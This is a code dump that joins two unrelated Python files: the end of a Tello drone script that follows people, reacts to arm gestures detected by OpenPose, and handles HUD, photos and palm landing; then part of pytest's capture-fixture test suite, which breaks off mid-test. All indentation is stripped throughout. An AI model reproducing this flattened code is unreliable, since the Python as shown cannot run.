return "CLOSE_HANDS_UP"
else:
if left_hand_up:
# Only left arm up
if l_ear and (l_ear[0]-neck[0])*(l_wrist[0]-neck[0])>0:
# Left ear and left hand on the same side
if vert_angle_left_arm:
if vert_angle_left_arm < -15:
return "LEFT_ARM_UP_CLOSED"
if 15 < vert_angle_left_arm < 90:
return "LEFT_ARM_UP_OPEN"
elif r_ear and self.shoulders_width and distance(l_wrist,r_ear) < self.shoulders_width/4:
# Left hand close to right ear
return "LEFT_HAND_ON_RIGHT_EAR"
else:
# Both wrists under the neck
if neck and self.shoulders_width and r_wrist and l_wrist:
near_dist = self.shoulders_width/3
if distance(r_wrist, neck) < near_dist and distance(l_wrist, neck) < near_dist :
return "HANDS_ON_NECK"
return None
def process_frame(self, raw_frame):
"""
Analyze the frame and return the frame with information (HUD, openpose skeleton) drawn on it
"""
frame = raw_frame.copy()
h,w,_ = frame.shape
proximity = int(w/2.6)
min_distance = int(w/2)
# Is there a scheduled takeoff ?
if self.scheduled_takeoff and time.time() > self.scheduled_takeoff:
self.scheduled_takeoff = None
self.drone.takeoff()
self.axis_speed = self.cmd_axis_speed.copy()
# If we are on the point to take a picture, the tracking is temporarily desactivated (2s)
if self.timestamp_take_picture:
if time.time() - self.timestamp_take_picture > 2:
self.timestamp_take_picture = None
self.drone.take_picture()
else:
# If we are doing a 360, where are we in our 360 ?
if self.yaw_to_consume > 0:
consumed = self.yaw - self.prev_yaw
self.prev_yaw = self.yaw
if consumed < 0: consumed += 360
self.yaw_consumed += consumed
if self.yaw_consumed > self.yaw_to_consume:
self.yaw_to_consume = 0
self.axis_speed["yaw"] = 0
else:
self.axis_speed["yaw"] = self.def_speed["yaw"]
# We are not flying, we check a potential morse code
if not self.is_flying:
pressing, detected = self.morse.eval(frame)
if self.is_pressed and not pressing:
self.tone.off()
elif not self.is_pressed and pressing:
self.tone.on()
self.is_pressed = pressing
# Call to openpose detection
if self.use_openpose:
nb_people, pose_kps, face_kps = self.op.eval(frame)
target = None
# Our target is the person whose index is 0 in pose_kps
self.pose = None
if nb_people > 0 :
# We found a body, so we can cancel the exploring 360
self.yaw_to_consume = 0
# Do we recognize a predefined pose ?
self.pose = self.check_pose(w,h)
if self.pose:
# We trigger the associated action
log.info(f"pose detected : {self.pose}")
if self.pose == "HANDS_ON_NECK" or self.pose == "HANDS_ON_EARS":
# Take a picture in 1 second
if self.timestamp_take_picture is None:
log.info("Take a picture in 1 second")
self.timestamp_take_picture = time.time()
self.sound_player.play("taking picture")
elif self.pose == "RIGHT_ARM_UP_CLOSED":
log.info("GOING LEFT from pose")
self.axis_speed["roll"] = self.def_speed["roll"]
elif self.pose == "RIGHT_ARM_UP_OPEN":
log.info("GOING RIGHT from pose")
self.axis_speed["roll"] = -self.def_speed["roll"]
elif self.pose == "LEFT_ARM_UP_CLOSED":
log.info("GOING FORWARD from pose")
self.axis_speed["pitch"] = self.def_speed["pitch"]
elif self.pose == "LEFT_ARM_UP_OPEN":
log.info("GOING BACKWARD from pose")
self.axis_speed["pitch"] = -self.def_speed["pitch"]
elif self.pose == "CLOSE_HANDS_UP":
# Locked distance mode
if self.keep_distance is None:
if time.time() - self.timestamp_keep_distance > 2:
# The first frame of a serie to activate the distance keeping
self.keep_distance = self.shoulders_width
self.timestamp_keep_distance = time.time()
log.info(f"KEEP DISTANCE {self.keep_distance}")
self.pid_pitch = PID(0.5,0.04,0.3,setpoint=0,output_limits=(-50,50))
#self.graph_distance = RollingGraph(window_name="Distance", y_max=500, threshold=self.keep_distance, waitKey=False)
self.sound_player.play("keeping distance")
else:
if time.time() - self.timestamp_keep_distance > 2:
log.info("KEEP DISTANCE FINISHED")
self.sound_player.play("free")
self.keep_distance = None
self.timestamp_keep_distance = time.time()
elif self.pose == "RIGHT_HAND_ON_LEFT_EAR":
# Get close to the body then palm landing
if not self.palm_landing_approach:
self.palm_landing_approach = True
self.keep_distance = proximity
self.timestamp_keep_distance = time.time()
log.info("APPROACHING on pose")
self.pid_pitch = PID(0.2,0.02,0.1,setpoint=0,output_limits=(-45,45))
#self.graph_distance = RollingGraph(window_name="Distance", y_max=500, threshold=self.keep_distance, waitKey=False)
self.sound_player.play("approaching")
elif self.pose == "LEFT_HAND_ON_RIGHT_EAR":
if not self.palm_landing:
log.info("LANDING on pose")
# Landing
self.toggle_tracking(tracking=False)
self.drone.land()
# Draw the skeleton on the frame
self.op.draw_body(frame)
# In tracking mode, we track a specific body part (an openpose keypoint):
# the nose if visible, otherwise the neck, otherwise the midhip
# The tracker tries to align that body part with the reference point (ref_x, ref_y)
target = self.op.get_body_kp("Nose")
if target is not None:
ref_x = int(w/2)
ref_y = int(h*0.35)
else:
target = self.op.get_body_kp("Neck")
if target is not None:
ref_x = int(w/2)
ref_y = int(h/2)
else:
target = self.op.get_body_kp("MidHip")
if target is not None:
ref_x = int(w/2)
ref_y = int(0.75*h)
if self.tracking:
if target:
self.body_in_prev_frame = True
# We draw an arrow from the reference point to the body part we are targeting
h,w,_ = frame.shape
xoff = int(target[0]-ref_x)
yoff = int(ref_y-target[1])
cv2.circle(frame, (ref_x, ref_y), 15, (250,150,0), 1,cv2.LINE_AA)
cv2.arrowedLine(frame, (ref_x, ref_y), target, (250, 150, 0), 6)
# The PID controllers calculate the new speeds for yaw and throttle
self.axis_speed["yaw"] = int(-self.pid_yaw(xoff))
log.debug(f"xoff: {xoff} - speed_yaw: {self.axis_speed['yaw']}")
self.last_rotation_is_cw = self.axis_speed["yaw"] > 0
self.axis_speed["throttle"] = int(-self.pid_throttle(yoff))
log.debug(f"yoff: {yoff} - speed_throttle: {self.axis_speed['throttle']}")
# If in locke distance mode
if self.keep_distance and self.shoulders_width:
if self.palm_landing_approach and self.shoulders_width>self.keep_distance:
# The drone is now close enough to the body
# Let's do the palm landing
log.info("PALM LANDING after approaching")
self.palm_landing_approach = False
self.toggle_tracking(tracking=False)
self.palm_land()
else:
self.axis_speed["pitch"] = int(self.pid_pitch(self.shoulders_width-self.keep_distance))
log.debug(f"Target distance: {self.keep_distance} - cur: {self.shoulders_width} -speed_pitch: {self.axis_speed['pitch']}")
else: # Tracking but no body detected
if self.body_in_prev_frame:
self.timestamp_no_body = time.time()
self.body_in_prev_frame = False
self.axis_speed["throttle"] = self.prev_axis_speed["throttle"]
self.axis_speed["yaw"] = self.prev_axis_speed["yaw"]
else:
if time.time() - self.timestamp_no_body < 1:
print("NO BODY SINCE < 1", self.axis_speed, self.prev_axis_speed)
self.axis_speed["throttle"] = self.prev_axis_speed["throttle"]
self.axis_speed["yaw"] = self.prev_axis_speed["yaw"]
else:
log.debug("NO BODY detected for 1s -> rotate")
self.axis_speed["yaw"] = self.def_speed["yaw"] * (1 if self.last_rotation_is_cw else -1)
# Send axis commands to the drone
for axis, command in self.axis_command.items():
if self.axis_speed[axis]is not None and self.axis_speed[axis] != self.prev_axis_speed[axis]:
log.debug(f"COMMAND {axis} : {self.axis_speed[axis]}")
command(self.axis_speed[axis])
self.prev_axis_speed[axis] = self.axis_speed[axis]
else:
# This line is necessary to display current values in 'self.write_hud'
self.axis_speed[axis] = self.prev_axis_speed[axis]
# Write the HUD on the frame
frame = self.write_hud(frame)
return frame
def write_hud(self, frame):
"""
Draw drone info on frame
"""
class HUD:
def __init__(self, def_color=(255, 170, 0)):
self.def_color = def_color
self.infos = []
def add(self, info, color=None):
if color is None: color = self.def_color
self.infos.append((info, color))
def draw(self, frame):
i=0
for (info, color) in self.infos:
cv2.putText(frame, info, (0, 30 + (i * 30)),
cv2.FONT_HERSHEY_SIMPLEX,
1.0, color, 2) #lineType=30)
i+=1
hud = HUD()
if self.debug: hud.add(datetime.datetime.now().strftime('%H:%M:%S'))
hud.add(f"FPS {self.fps.get():.2f}")
if self.debug: hud.add(f"VR {self.video_encoder_rate}")
hud.add(f"BAT {self.battery}")
if self.is_flying:
hud.add("FLYING", (0,255,0))
else:
hud.add("NOT FLYING", (0,0,255))
hud.add(f"TRACKING {'ON' if self.tracking else 'OFF'}", (0,255,0) if self.tracking else (0,0,255) )
hud.add(f"EXPO {self.exposure}")
if self.axis_speed['yaw'] > 0:
hud.add(f"CW {self.axis_speed['yaw']}", (0,255,0))
elif self.axis_speed['yaw'] < 0:
hud.add(f"CCW {-self.axis_speed['yaw']}", (0,0,255))
else:
hud.add(f"CW 0")
if self.axis_speed['roll'] > 0:
hud.add(f"RIGHT {self.axis_speed['roll']}", (0,255,0))
elif self.axis_speed['roll'] < 0:
hud.add(f"LEFT {-self.axis_speed['roll']}", (0,0,255))
else:
hud.add(f"RIGHT 0")
if self.axis_speed['pitch'] > 0:
hud.add(f"FORWARD {self.axis_speed['pitch']}", (0,255,0))
elif self.axis_speed['pitch'] < 0:
hud.add(f"BACKWARD {-self.axis_speed['pitch']}", (0,0,255))
else:
hud.add(f"FORWARD 0")
if self.axis_speed['throttle'] > 0:
hud.add(f"UP {self.axis_speed['throttle']}", (0,255,0))
elif self.axis_speed['throttle'] < 0:
hud.add(f"DOWN {-self.axis_speed['throttle']}", (0,0,255))
else:
hud.add(f"UP 0")
if self.use_openpose: hud.add(f"POSE: {self.pose}", (0,255,0) if self.pose else (255, 170, 0))
if self.keep_distance:
hud.add(f"Target distance: {self.keep_distance} - curr: {self.shoulders_width}", (0,255,0))
#if self.shoulders_width: self.graph_distance.new_iter([self.shoulders_width])
if self.timestamp_take_picture: hud.add("Taking a picture", (0,255,0))
if self.palm_landing:
hud.add("Palm landing...", (0,255,0))
if self.palm_landing_approach:
hud.add("In approach for palm landing...", (0,255,0))
if self.tracking and not self.body_in_prev_frame and time.time() - self.timestamp_no_body > 0.5:
hud.add("Searching...", (0,255,0))
if self.throw_ongoing:
hud.add("Throw ongoing...", (0,255,0))
if self.scheduled_takeoff:
seconds_left = int(self.scheduled_takeoff - time.time())
hud.add(f"Takeoff in {seconds_left}s")
hud.draw(frame)
return frame
def take_picture(self):
"""
Tell drone to take picture, image sent to file handler
"""
self.drone.take_picture()
def set_exposure(self, expo):
"""
Change exposure of drone camera
"""
if expo == 0:
self.exposure = 0
elif expo == 1:
self.exposure = min(9, self.exposure+1)
elif expo == -1:
self.exposure = max(-9, self.exposure-1)
self.drone.set_exposure(self.exposure)
log.info(f"EXPOSURE {self.exposure}")
def palm_land(self):
"""
Tell drone to land
"""
self.palm_landing = True
self.sound_player.play("palm landing")
self.drone.palm_land()
def throw_and_go(self, tracking=False):
"""
Tell drone to start a 'throw and go'
"""
self.drone.throw_and_go()
self.tracking_after_takeoff = tracking
def delayed_takeoff(self, delay=5):
self.scheduled_takeoff = time.time()+delay
self.tracking_after_takeoff = True
def clockwise_degrees(self, degrees):
self.yaw_to_consume = degrees
self.yaw_consumed = 0
self.prev_yaw = self.yaw
def toggle_openpose(self):
self.use_openpose = not self.use_openpose
if not self.use_openpose:
# Desactivate tracking
self.toggle_tracking(tracking=False)
log.info('OPENPOSE '+("ON" if self.use_openpose else "OFF"))
def toggle_tracking(self, tracking=None):
"""
If tracking is None, toggle value of self.tracking
Else self.tracking take the same value as tracking
"""
if tracking is None:
self.tracking = not self.tracking
else:
self.tracking = tracking
if self.tracking:
log.info("ACTIVATE TRACKING")
# Needs openpose
self.use_openpose = True
# Start an explarotary 360
#self.clockwise_degrees(360)
# Init a PID controller for the yaw
self.pid_yaw = PID(0.25,0,0,setpoint=0,output_limits=(-100,100))
# ... and one for the throttle
self.pid_throttle = PID(0.4,0,0,setpoint=0,output_limits=(-80,100))
# self.init_tracking = True
else:
self.axis_speed = { "yaw":0, "roll":0, "pitch":0, "throttle":0}
self.keep_distance = None
return
def flight_data_handler(self, event, sender, data):
"""
Listener to flight data from the drone.
"""
self.battery = data.battery_percentage
self.fly_mode = data.fly_mode
self.throw_fly_timer = data.throw_fly_timer
self.throw_ongoing = data.throw_fly_timer > 0
# print("fly_mode",data.fly_mode)
# print("throw_fly_timer",data.throw_fly_timer)
# print("em_ground",data.em_ground)
# print("em_sky",data.em_sky)
# print("electrical_machinery_state",data.electrical_machinery_state)
#print("em_sky",data.em_sky,"em_ground",data.em_ground,"em_open",data.em_open)
#print("height",data.height,"imu_state",data.imu_state,"down_visual_state",data.down_visual_state)
if self.is_flying != data.em_sky:
self.is_flying = data.em_sky
log.debug(f"FLYING : {self.is_flying}")
if not self.is_flying:
self.reset()
else:
if self.tracking_after_takeoff:
log.info("Tracking on after takeoff")
self.toggle_tracking(True)
log.debug(f"MODE: {self.fly_mode} - Throw fly timer: {self.throw_fly_timer}")
def log_data_handler(self, event, sender, data):
"""
Listener to log data from the drone.
"""
pos_x = -data.mvo.pos_x
pos_y = -data.mvo.pos_y
pos_z = -data.mvo.pos_z
if abs(pos_x)+abs(pos_y)+abs(pos_z) > 0.07:
if self.ref_pos_x == -1: # First time we have meaningful values, we store them as reference
self.ref_pos_x = pos_x
self.ref_pos_y = pos_y
self.ref_pos_z = pos_z
else:
self.pos_x = pos_x - self.ref_pos_x
self.pos_y = pos_y - self.ref_pos_y
self.pos_z = pos_z - self.ref_pos_z
qx = data.imu.q1
qy = data.imu.q2
qz = data.imu.q3
qw = data.imu.q0
self.yaw = quat_to_yaw_deg(qx,qy,qz,qw)
if self.write_log_data:
if self.write_header:
self.log_file.write('%s\n' % data.format_cvs_header())
self.write_header = False
self.log_file.write('%s\n' % data.format_cvs())
def handle_flight_received(self, event, sender, data):
"""
Create a file in local directory to receive image from the drone
"""
path = f'{self.media_directory}/tello-{datetime.datetime.now().strftime(self.date_fmt)}.jpg'
with open(path, 'wb') as out_file:
out_file.write(data)
log.info('Saved photo to %s' % path)
if __name__ == '__main__':
ap=argparse.ArgumentParser()
ap.add_argument("-l","--log_level", help="select a log level (info, debug)")
ap.add_argument("-2","--multiprocess", action='store_true', help="use 2 processes to share the workload (instead of 1)")
args=ap.parse_args()
main(use_multiprocessing=args.multiprocess, log_level=args.log_level) |
test_capture.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import io
import os
import pickle
import subprocess
import sys
import textwrap
from io import UnsupportedOperation
import py
from six import text_type
import pytest
from _pytest import capture
from _pytest.capture import CaptureManager
from _pytest.compat import _PY3
from _pytest.main import EXIT_NOTESTSCOLLECTED
# note: py.io capture tests where copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
needsosdup = pytest.mark.skipif(
not hasattr(os, "dup"), reason="test needs os.dup, not available on this platform"
)
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def StdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.SysCapture)
class TestCaptureManager(object):
def test_getmethod_default_no_fd(self, monkeypatch):
from _pytest.capture import pytest_addoption
from _pytest.config.argparsing import Parser
parser = Parser()
pytest_addoption(parser)
default = parser._groups[0].options[0].default
assert default == "fd" if hasattr(os, "dup") else "sys"
parser = Parser()
monkeypatch.delattr(os, "dup", raising=False)
pytest_addoption(parser)
assert parser._groups[0].options[0].default == "sys"
@pytest.mark.parametrize(
"method", ["no", "sys", pytest.param("fd", marks=needsosdup)]
)
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@needsosdup
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, capman.start_global_capturing)
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(testdir, method):
if hasattr(sys, "pypy_version_info") and sys.pypy_version_info < (2, 2):
pytest.xfail("does not work on pypy < 2.2")
if sys.version_info >= (3, 0):
obj = "'b\u00f6y'"
else:
obj = "u'\u00f6y'"
testdir.makepyfile(
"""
# coding=utf8
# taken from issue 227 from nosetests
def test_unicode():
import sys
print(sys.stdout)
print(%s)
"""
% obj
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile(
"""
def test_unicode():
print('b\\u00f6y')
"""
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(testdir):
p = testdir.makepyfile(
"""
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*Captured stdout*",
"collect 13 failure",
"*Captured stderr*",
"collect 13_stderr failure",
]
)
class TestPerTestCapturing(object):
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile(
"""
def setup_module(mod):
print("setup module")
def setup_function(function):
print("setup " + function.__name__)
def test_func1():
print("in func1")
assert 0
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
]
)
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile(
"""
import sys
def setup_module(func):
print("module-setup")
def setup_function(func):
print("function-setup")
def test_func():
print("in function")
assert 0
def teardown_function(func):
print("in teardown")
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
]
)
def test_no_carry_over(self, testdir):
p = testdir.makepyfile(
"""
def test_func1():
print("in func1")
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile(
"""
def setup_function(function):
print("setup func1")
def teardown_function(function):
print("teardown func1")
assert 0
def test_func1():
print("in func1")
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*teardown_function*",
"*Captured stdout*",
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
]
)
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile(
"""
def teardown_module(mod):
print("teardown module")
assert 0
def test_func():
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
]
)
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile(
"""\
import sys
def test_capturing():
print(42)
sys.stderr.write(str(23))
def test_capturing_error():
print(1)
sys.stderr.write(str(2))
raise ValueError
"""
)
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines(
[
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
]
)
class TestLoggingInteraction(object):
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile(
"""\
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
"""
)
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_function(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_function(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors show first!
)
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_module(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_module(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors come first
)
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
logging.warning("hello435")
"""
)
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == EXIT_NOTESTSCOLLECTED
result.stderr.fnmatch_lines(["WARNING*hello435*"])
assert "operation on closed file" not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello():
import logging
logging.warning("hello433")
assert 0
"""
)
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines(["WARNING*hello433*"])
assert "something" not in result.stderr.str()
assert "operation on closed file" not in result.stderr.str()
def test_logging_after_cap_stopped(self, testdir):
testdir.makeconftest(
"""\
import pytest
import logging
log = logging.getLogger(__name__)
@pytest.fixture
def log_on_teardown():
yield
log.warning('Logging on teardown')
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello(log_on_teardown):
import logging
logging.warning("hello433")
assert 1
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p, "--log-cli-level", "info")
assert result.ret != 0
result.stdout.fnmatch_lines(
["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
)
assert (
"AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
not in result.stderr.str()
)
class TestCaptureFixture(object):
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsys):
print(42)
out, err = capsys.readouterr()
assert out.startswith("42")
""",
*opt
)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 error*",
]
)
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile(
"""\
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*test_one*",
"*capsys*capfd*same*time*",
"*test_two*",
"*capfd*capsys*same*time*",
"*2 failed in*",
]
)
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfdbinary):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
)
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile(
"""\
def test_hello(cap{}):
print("xxx42xxx")
assert 0
""".format(
method
)
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["xxx42xxx"])
@needsosdup
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfd):
import os
os.write(1, "42".encode('ascii'))
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
"""
)
reprec.assertoutcome(passed=1)
@needsosdup
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
sys.version_info < (3,), reason="only have capsysbinary in python 3"
)
def test_capsysbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsysbinary):
import sys
# some likely un-decodable bytes
sys.stdout.buffer.write(b'\\xfe\\x98\\x20')
out, err = capsysbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
sys.version_info >= (3,), reason="only have capsysbinary in python 3"
)
def test_capsysbinary_forbidden_in_python2(self, testdir):
testdir.makepyfile(
"""\
def test_hello(capsysbinary):
pass
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*test_hello*",
"*capsysbinary is only supported on Python 3*",
"*1 error in*",
]
)
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capsys, missingarg):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])
@needsosdup
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capfd):
import os
os.write(1, str(42).encode('ascii'))
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
assert result.ret == 2
def test_capture_and_logging(self, testdir):
"""#14"""
p = testdir.makepyfile(
"""\
import logging
def test_log(capsys):
logging.error('x')
"""
)
result = testdir.runpytest_subprocess(p)
assert "closed" not in result.stderr.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
@pytest.mark.parametrize("no_capture", [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile(
"""\
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(
fixture=fixture
)
)
args = ("-s",) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines(
"""
*while capture is disabled*
"""
)
assert "captured before" not in result.stdout.str()
assert "captured after" not in result.stdout.str()
if no_capture:
assert "test_normal executed" in result.stdout.str()
else:
assert "test_normal executed" not in result.stdout.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""
Ensure that capsys and capfd can be used by other fixtures during setup and teardown.
"""
testdir.makepyfile(
"""\
from __future__ import print_function
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(
fixture=fixture
)
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed*"])
assert "stdout contents begin" not in result.stdout.str()
assert "stderr contents begin" not in result.stdout.str()
@pytest.mark.parametrize("cap", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures_teardown(self, testdir, cap):
"""Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
testdir.makepyfile(
"""\
import sys
import pytest
import os
@pytest.fixture()
def fix({cap}):
print("setup out")
sys.stderr.write("setup err\\n")
yield
out, err = {cap}.readouterr()
assert out == 'setup out\\ncall out\\n'
assert err == 'setup err\\ncall err\\n'
def test_a(fix):
print("call out")
sys.stderr.write("call err\\n")
""".format(
cap=cap
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
def pytest_runtest_setup(item):
raise ValueError(42)
"""
)
)
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, "--traceconfig")
result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_fdfuncarg_skips_on_no_osdup(testdir):
testdir.makepyfile(
"""
import os
if hasattr(os, 'dup'):
del os.dup
def test_hello(capfd):
pass
"""
)
result = testdir.runpytest_subprocess("--capture=no")
result.stdout.fnmatch_lines(["*1 skipped*"])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
assert "hello19" not in result.stdout.str()
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile(
"""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
"""
)
result = testdir.runpytest("--cap=fd")
result.stdout.fnmatch_lines(
"""
*def test_func*
*assert 0*
*Captured*
*1 failed*
"""
)
def test_capture_early_option_parsing(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert "hello19" in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(
r"""
import pytest
